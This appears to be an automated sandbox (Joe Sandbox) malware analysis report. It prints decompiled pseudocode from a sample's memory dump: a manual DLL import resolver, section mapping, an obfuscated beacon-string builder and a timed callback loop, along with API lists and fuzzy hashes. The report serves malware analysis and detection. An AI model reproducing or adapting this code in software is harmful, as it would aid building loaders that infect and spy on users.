                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                • String ID:
                                • API String ID: 3850880919-0
                                • Opcode ID: 961e6bc38baa5f05f766506e60b16c64e16de5384d07084139a8765e1fbd93f2
                                • Instruction ID: cb89ba1b54c474de3f94986b2ef39f0b15760c20d17b54da23d7a69f19b56b99
                                • Opcode Fuzzy Hash: 961e6bc38baa5f05f766506e60b16c64e16de5384d07084139a8765e1fbd93f2
                                • Instruction Fuzzy Hash: 3221E876900208FFCB11DFE9D989DEEBBB8EF45304B5444AAE501E7250D6309F45DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 1000119D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 72%
                                			E1000119D(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E1000129A(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                0x100011a6
                                0x100011ad
                                0x100011ae
                                0x100011af
                                0x100011b0
                                0x100011b1
                                0x100011c2
                                0x100011c6
                                0x100011da
                                0x100011dd
                                0x100011e0
                                0x100011e7
                                0x100011ea
                                0x100011f1
                                0x100011f4
                                0x100011f7
                                0x100011fa
                                0x100011ff
                                0x1000123a
                                0x10001201
                                0x10001204
                                0x1000120a
                                0x1000120f
                                0x10001213
                                0x10001231
                                0x10001215
                                0x1000121c
                                0x1000122a
                                0x1000122a
                                0x10001213
                                0x10001242

                                APIs
                                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 100011FA
                                  • Part of subcall function 1000129A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,1000120F,00000002,00000000,?,?,00000000,?,?,1000120F,00000002), ref: 100012C7
                                • memset.NTDLL ref: 1000121C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Section$CreateViewmemset
                                • String ID: @
                                • API String ID: 2533685722-2766056989
                                • Opcode ID: 265b71dd6ff0657094f66a8f67bacc0947f81f036b07ed031d0e4457376ecc91
                                • Instruction ID: fb0ef012b85b6010ba7c5694ad3768ad2f66879cb32ce24129577d482c24e11d
                                • Opcode Fuzzy Hash: 265b71dd6ff0657094f66a8f67bacc0947f81f036b07ed031d0e4457376ecc91
                                • Instruction Fuzzy Hash: 96211AB6D00209AFDB11DFA9C8849DEFBF9EF48354F10842AE615F3211D735AA558BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 10001753, Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E10001753(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x10004140;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                                0x10001753
                                0x1000175c
                                0x10001761
                                0x10001767
                                0x10001770
                                0x10001776
                                0x10001778
                                0x1000177b
                                0x10001780
                                0x10001787
                                0x10001787
                                0x1000178b
                                0x10001791
                                0x10001796
                                0x00000000
                                0x00000000
                                0x1000179c
                                0x100017a6
                                0x100017a8
                                0x100017ab
                                0x100017ae
                                0x100017b2
                                0x100017ba
                                0x100017bc
                                0x100017bf
                                0x10001827
                                0x10001827
                                0x1000182b
                                0x00000000
                                0x00000000
                                0x100017c4
                                0x100017ca
                                0x100017cc
                                0x100017df
                                0x100017e2
                                0x100017e2
                                0x100017e2
                                0x100017e6
                                0x100017ce
                                0x100017ce
                                0x100017d6
                                0x100017d8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x100017d8
                                0x100017c6
                                0x100017c6
                                0x100017da
                                0x100017da
                                0x100017da
                                0x100017e9
                                0x100017ec
                                0x100017ee
                                0x100017f5
                                0x100017f0
                                0x100017f0
                                0x100017f0
                                0x100017fd
                                0x10001803
                                0x10001805
                                0x10001835
                                0x10001807
                                0x10001807
                                0x1000180a
                                0x1000180c
                                0x10001814
                                0x10001814
                                0x10001819
                                0x1000181b
                                0x10001822
                                0x10001824
                                0x10001824
                                0x10001824
                                0x00000000
                                0x10001824
                                0x00000000
                                0x10001805
                                0x100017b4
                                0x100017b4
                                0x100017b8
                                0x00000000
                                0x00000000
                                0x100017b8
                                0x10001838
                                0x10001838
                                0x1000183f
                                0x10001844
                                0x00000000
                                0x00000000
                                0x1000184a
                                0x10001855
                                0x00000000
                                0x10001855
                                0x1000184c
                                0x1000184c
                                0x10001852
                                0x00000000
                                0x10001852
                                0x10001780
                                0x10001856
                                0x1000185b

                                APIs
                                • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 1000178B
                                • GetProcAddress.KERNEL32(?,00000000), ref: 100017FD
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID:
                                • API String ID: 2574300362-0
                                • Opcode ID: 70ecc16c6501927fe6db6f758ebb3a938f0ac427aab5bfe6df336eca88a01f20
                                • Instruction ID: 50a551485af94626e36314b7bf6b70129b1ae1d3f994bda35dae46301a5f1ec2
                                • Opcode Fuzzy Hash: 70ecc16c6501927fe6db6f758ebb3a938f0ac427aab5bfe6df336eca88a01f20
                                • Instruction Fuzzy Hash: 28315E75A0520ADFEB54CF59C890AEEB7F9FF04390B21816DD905E7248EB70DA41CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 1000129A, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E1000129A(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                0x100012ac
                                0x100012b2
                                0x100012c0
                                0x100012c7
                                0x100012cc
                                0x100012d2
                                0x00000000
                                0x100012d3
                                0x00000000

                                APIs
                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,1000120F,00000002,00000000,?,?,00000000,?,?,1000120F,00000002), ref: 100012C7
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: SectionView
                                • String ID:
                                • API String ID: 1323581903-0
                                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                • Instruction ID: 1bbf4d541b5034d903cd5fef98454c375a8041f9e67df69a1e1feed1aad9265f
                                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                • Instruction Fuzzy Hash: D1F01CB690020CFFEB119FA5DC85C9FBBBDEB44294B104939B552E1094D6309E189A60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D49BF1, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201memorystringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 66%
                                			E00D49BF1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				void* _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0xd4d018; // 0xefcf766a
				asm("bswap eax");
				_t27 =  *0xd4d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0xd4d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 = E00D4D00C; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0xd4d2a8; // 0x253a5a8
				_t3 = _t30 + 0xd4e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d163, _t29, _t28, _t27, _t26,  *0xd4d02c,  *0xd4d004, _t25);
				_t33 = E00D43288();
				_t34 =  *0xd4d2a8; // 0x253a5a8
				_t4 = _t34 + 0xd4e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E00D4831C(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0xd4d2a8; // 0x253a5a8
					_t6 = _t83 + 0xd4e8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0xd4d238, 0, _t96); // executed
				}
				_t39 = E00D49267(); // executed
				_t97 = _t39;
				if(_t97 != 0) {
					_t78 =  *0xd4d2a8; // 0x253a5a8
					_t8 = _t78 + 0xd4e8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0xd4d238, 0, _t97);
				}
				_t98 =  *0xd4d32c; // 0x32895b0
				_a32 = E00D4284E(0xd4d00a, _t98 + 4);
				_t42 =  *0xd4d2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0xd4d2a8; // 0x253a5a8
					_t11 = _t74 + 0xd4e8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0xd4d2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0xd4d2a8; // 0x253a5a8
					_t13 = _t71 + 0xd4e88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0xd4d238, 0, 0x800);
					if(_t100 != 0) {
						E00D43239(GetTickCount());
						_t50 =  *0xd4d32c; // 0x32895b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0xd4d32c; // 0x32895b0
						__imp__(_t54 + 0x40);
						_t56 =  *0xd4d32c; // 0x32895b0
						_t103 = E00D47B8D(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0xd4c28c);
							_push(_t103);
							_t62 = E00D4A677();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E00D4933A(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E00D45433();
								}
								HeapFree( *0xd4d238, 0, _v44);
							}
							RtlFreeHeap( *0xd4d238, 0, _t103); // executed
						}
						RtlFreeHeap( *0xd4d238, 0, _t100); // executed
					}
					HeapFree( *0xd4d238, 0, _a24);
				}
				RtlFreeHeap( *0xd4d238, 0, _t105); // executed
				return _a4;
			}


















































                                0x00d49bf1
                                0x00d49bf1
                                0x00d49bf1
                                0x00d49bf6
                                0x00d49bfc
                                0x00d49c06
                                0x00d49c08
                                0x00d49c08
                                0x00d49c15
                                0x00d49c20
                                0x00d49c23
                                0x00d49c2e
                                0x00d49c31
                                0x00d49c36
                                0x00d49c39
                                0x00d49c3e
                                0x00d49c41
                                0x00d49c4d
                                0x00d49c5a
                                0x00d49c5c
                                0x00d49c62
                                0x00d49c67
                                0x00d49c72
                                0x00d49c74
                                0x00d49c77
                                0x00d49c79
                                0x00d49c7e
                                0x00d49c82
                                0x00d49c84
                                0x00d49c89
                                0x00d49c95
                                0x00d49c97
                                0x00d49ca3
                                0x00d49ca5
                                0x00d49ca5
                                0x00d49cab
                                0x00d49cb0
                                0x00d49cb4
                                0x00d49cb6
                                0x00d49cbb
                                0x00d49cc7
                                0x00d49cc9
                                0x00d49cd5
                                0x00d49cd7
                                0x00d49cd7
                                0x00d49cdd
                                0x00d49cf0
                                0x00d49cf4
                                0x00d49cfb
                                0x00d49cfe
                                0x00d49d03
                                0x00d49d0e
                                0x00d49d10
                                0x00d49d13
                                0x00d49d13
                                0x00d49d15
                                0x00d49d1c
                                0x00d49d1f
                                0x00d49d24
                                0x00d49d2e
                                0x00d49d30
                                0x00d49d38
                                0x00d49d51
                                0x00d49d55
                                0x00d49d61
                                0x00d49d66
                                0x00d49d6f
                                0x00d49d80
                                0x00d49d84
                                0x00d49d8d
                                0x00d49d93
                                0x00d49da0
                                0x00d49dad
                                0x00d49db3
                                0x00d49dbf
                                0x00d49dc5
                                0x00d49dc6
                                0x00d49dcb
                                0x00d49dd1
                                0x00d49dd7
                                0x00d49dde
                                0x00d49de5
                                0x00d49deb
                                0x00d49df2
                                0x00d49df6
                                0x00d49e01
                                0x00d49e06
                                0x00d49e0c
                                0x00d49e15
                                0x00d49e15
                                0x00d49e26
                                0x00d49e26
                                0x00d49e35
                                0x00d49e35
                                0x00d49e44
                                0x00d49e44
                                0x00d49e56
                                0x00d49e56
                                0x00d49e65
                                0x00d49e76

                                APIs
                                • GetTickCount.KERNEL32 ref: 00D49C08
                                • wsprintfA.USER32 ref: 00D49C55
                                • wsprintfA.USER32 ref: 00D49C72
                                • wsprintfA.USER32 ref: 00D49C95
                                • HeapFree.KERNEL32(00000000,00000000), ref: 00D49CA5
                                • wsprintfA.USER32 ref: 00D49CC7
                                • HeapFree.KERNEL32(00000000,00000000), ref: 00D49CD7
                                • wsprintfA.USER32 ref: 00D49D0E
                                • wsprintfA.USER32 ref: 00D49D2E
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00D49D4B
                                • GetTickCount.KERNEL32 ref: 00D49D5B
                                • RtlEnterCriticalSection.NTDLL(03289570), ref: 00D49D6F
                                • RtlLeaveCriticalSection.NTDLL(03289570), ref: 00D49D8D
                                  • Part of subcall function 00D47B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,00D49DA0,?,032895B0), ref: 00D47BB8
                                  • Part of subcall function 00D47B8D: lstrlen.KERNEL32(?,?,?,00D49DA0,?,032895B0), ref: 00D47BC0
                                  • Part of subcall function 00D47B8D: strcpy.NTDLL ref: 00D47BD7
                                  • Part of subcall function 00D47B8D: lstrcat.KERNEL32(00000000,?), ref: 00D47BE2
                                  • Part of subcall function 00D47B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00D49DA0,?,032895B0), ref: 00D47BFF
                                • StrTrimA.SHLWAPI(00000000,00D4C28C,?,032895B0), ref: 00D49DBF
                                  • Part of subcall function 00D4A677: lstrlen.KERNEL32(03289B08,00000000,00000000,7691C740,00D49DCB,00000000), ref: 00D4A687
                                  • Part of subcall function 00D4A677: lstrlen.KERNEL32(?), ref: 00D4A68F
                                  • Part of subcall function 00D4A677: lstrcpy.KERNEL32(00000000,03289B08), ref: 00D4A6A3
                                  • Part of subcall function 00D4A677: lstrcat.KERNEL32(00000000,?), ref: 00D4A6AE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00D49DDE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00D49DE5
                                • lstrcat.KERNEL32(00000000,?), ref: 00D49DF2
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00D49DF6
                                  • Part of subcall function 00D4933A: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 00D493EC
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00D49E26
                                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00D49E35
                                • RtlFreeHeap.NTDLL(00000000,00000000,?,032895B0), ref: 00D49E44
                                • HeapFree.KERNEL32(00000000,00000000), ref: 00D49E56
                                • RtlFreeHeap.NTDLL(00000000,?), ref: 00D49E65
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                • String ID: Ut
                                • API String ID: 3080378247-8415677
                                • Opcode ID: 18000200cd5040f64bfe13544e84bb4200c1939b7fb68e2d85c00000c7e722d4
                                • Instruction ID: ca4e2b50e79f1b23f909ee282ab055097e01e64bd3ded3d52a260850a04fb667
                                • Opcode Fuzzy Hash: 18000200cd5040f64bfe13544e84bb4200c1939b7fb68e2d85c00000c7e722d4
                                • Instruction Fuzzy Hash: 6E619D39501300AFC7219F69EC89E6BBBEAEB4A750F040524F904D7371DB75E8059B79
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D47C3D, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 150timememoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 83%
                                			E00D47C3D(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xd4d240);
					_v20 = 0;
					_v16 = 0;
					L00D4AF6E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xd4d26c; // 0x208
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xd4d24c = 5;
						} else {
							_t68 = E00D45319(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xd4d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E00D42C58(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00D49870(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xd4d244);
							goto L21;
						} else {
							__eflags =  *0xd4d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E00D45433();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xd4d248);
								L21:
								L00D4AF6E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xd4d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                0x00d47c3d
                                0x00d47c4f
                                0x00d47c52
                                0x00d47c5e
                                0x00d47c64
                                0x00d47c69
                                0x00d47dd0
                                0x00d47c6f
                                0x00d47c6f
                                0x00d47c71
                                0x00d47c76
                                0x00d47c77
                                0x00d47c7d
                                0x00d47c80
                                0x00d47c83
                                0x00d47c91
                                0x00d47c9c
                                0x00d47c9f
                                0x00d47ca1
                                0x00d47cae
                                0x00d47cb8
                                0x00d47cba
                                0x00d47cbf
                                0x00d47cc4
                                0x00d47ccf
                                0x00d47ccf
                                0x00d47cc6
                                0x00d47cc6
                                0x00d47ccd
                                0x00000000
                                0x00000000
                                0x00d47ccd
                                0x00d47cd9
                                0x00000000
                                0x00d47cdc
                                0x00d47ce0
                                0x00d47ceb
                                0x00d47ceb
                                0x00d47cf2
                                0x00d47cfb
                                0x00d47d02
                                0x00d47d0b
                                0x00d47d0e
                                0x00d47d11
                                0x00d47d16
                                0x00d47d1b
                                0x00000000
                                0x00000000
                                0x00d47d1d
                                0x00d47d20
                                0x00d47d23
                                0x00d47d26
                                0x00000000
                                0x00d47d28
                                0x00d47d37
                                0x00d47d37
                                0x00000000
                                0x00d47d65
                                0x00d47d65
                                0x00d47d6a
                                0x00d47d89
                                0x00d47d8b
                                0x00d47d90
                                0x00d47d91
                                0x00000000
                                0x00d47d6c
                                0x00d47d6c
                                0x00d47d72
                                0x00000000
                                0x00d47d74
                                0x00d47d74
                                0x00d47d79
                                0x00d47d7b
                                0x00d47d80
                                0x00d47d81
                                0x00d47d97
                                0x00d47d97
                                0x00d47d9f
                                0x00d47daa
                                0x00d47dad
                                0x00d47db8
                                0x00d47dba
                                0x00d47dbd
                                0x00d47dbf
                                0x00000000
                                0x00d47dc5
                                0x00000000
                                0x00d47dc5
                                0x00d47dbf
                                0x00d47d72
                                0x00000000
                                0x00d47d6a
                                0x00d47d3a
                                0x00d47d3c
                                0x00d47d3f
                                0x00d47d40
                                0x00d47d40
                                0x00d47d44
                                0x00d47d4e
                                0x00d47d4e
                                0x00d47d54
                                0x00d47d57
                                0x00d47d57
                                0x00d47d5d
                                0x00d47d5d
                                0x00d47dda
                                0x00000000

                                APIs
                                • memset.NTDLL ref: 00D47C52
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00D47C5E
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00D47C83
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 00D47C9F
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00D47CB8
                                • HeapFree.KERNEL32(00000000,00000000), ref: 00D47D4E
                                • CloseHandle.KERNEL32(?), ref: 00D47D5D
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00D47D97
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00D4312C,?), ref: 00D47DAD
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00D47DB8
                                  • Part of subcall function 00D45319: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03289368,00000000,?,74E5F710,00000000,74E5F730), ref: 00D45368
